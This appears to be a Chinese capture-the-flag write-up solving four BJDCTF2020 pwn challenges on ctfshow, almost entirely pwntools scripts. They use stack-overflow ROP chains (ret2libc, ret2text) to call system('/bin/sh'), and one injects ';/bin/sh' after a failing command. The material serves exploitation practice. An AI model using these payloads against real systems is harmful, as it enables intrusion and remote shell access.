PWN-PRACTICE-CTFSHOW-4

PWN-PRACTICE-CTFSHOW-4

    • BJDCTF2020-babyrouter
    • BJDCTF2020-babystack
    • BJDCTF2020-dizzy
    • BJDCTF2020-encryptde stack

BJDCTF2020-babyrouter

栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28034)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4006AD
pop_rdi=0x400733
ret=0x4004c9

io.recvuntil("tell me u story!\n")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x06f690
system=libc_base+0x045390
binsh=libc_base+0x18cd57

io.recvuntil("tell me u story!\n")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)

io.interactive()

BJDCTF2020-babystack

栈溢出,ret2text

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28177)
elf=ELF("./pwn1")

io.sendlineafter("the length of your name:\n","-1")

backdoor=0x4006E6
ret=0x400561
io.recvuntil("u name?\n")
payload="a"*0x10+"b"*8+p64(ret)+p64(backdoor)
io.sendline(payload)

io.interactive()

BJDCTF2020-dizzy

利用linux系统命令行多命令执行的特点

Linux 系统可以在一个命令行上执行多个命令:
	; --如果命令被分号(;)所分隔,那么命令会连续的执行下去,就算是错误的命令也会继续执行后面的命令
	&& --如果命令被 && 所分隔,那么命令也会一直执行下去,但是中间有错误的命令就不会执行后面的命令,没错就继续执行直至命令执行完为止
	|| --如果命令被双竖线 || 所分隔,那么一遇到可以执行成功的命令就会停止执行后面的命令,而不管后面的命令是否正确。如果执行到错误的命令就是继续执行后一个命令,直到遇到执行到正确的命令或命令执行完为止

构造输入,使之能在进行加0x1BF52后得到"PvvN| 1S S0 GREAT!;/bin/sh\x00",分号前的命令会失败,但仍然会执行system("/bin/sh\x00")

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28161)
elf=ELF("./pwn1")

s="PvvN| 1S S0 GREAT!;/bin/sh".ljust(80,"\x00")
arr=[]
for i in range(0,len(s),4):
    tmp=hex(ord(s[i+3]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 2]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 1]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 0]))[2:].zfill(2)
    arr.append(int(tmp,16))
for i in range(len(arr)):
    arr[i]-=0x1BF52

#io.recvuntil("Let's play this!")
for i in range(20):
	io.sendline(str(arr[i]))

io.interactive()

BJDCTF2020-encryptde stack

程序打印随机数作为RSA密文,解RSA得到明文,循环20次,然后栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
import libnum
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28163)
elf=ELF("./pwn1")

n=94576960329497431
e=65537
p=261571747
q=361571773
phin=(p-1)*(q-1)
d=libnum.invmod(e,phin)

io.recvuntil("to encrypt it\n")
for i in range(20):
	c=int(io.recvuntil("\n")[:-1])
	m=pow(c,d,n)
	io.sendline(str(m))
	io.recvline()

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
vuln_addr=0x400B30
pop_rdi=0x40095a
ret=0x4006e1

io.recvuntil("inpu1t you name:\n")
payload="a"*0x48+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x06f690
system=libc_base+0x045390
binsh=libc_base+0x18cd57

io.recvuntil("inpu1t you name:\n")
payload="a"*0x48+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(vuln_addr)
io.sendline(payload)

io.interactive()

你可能感兴趣的:(Pwn-CTFSHOW,安全,系统安全)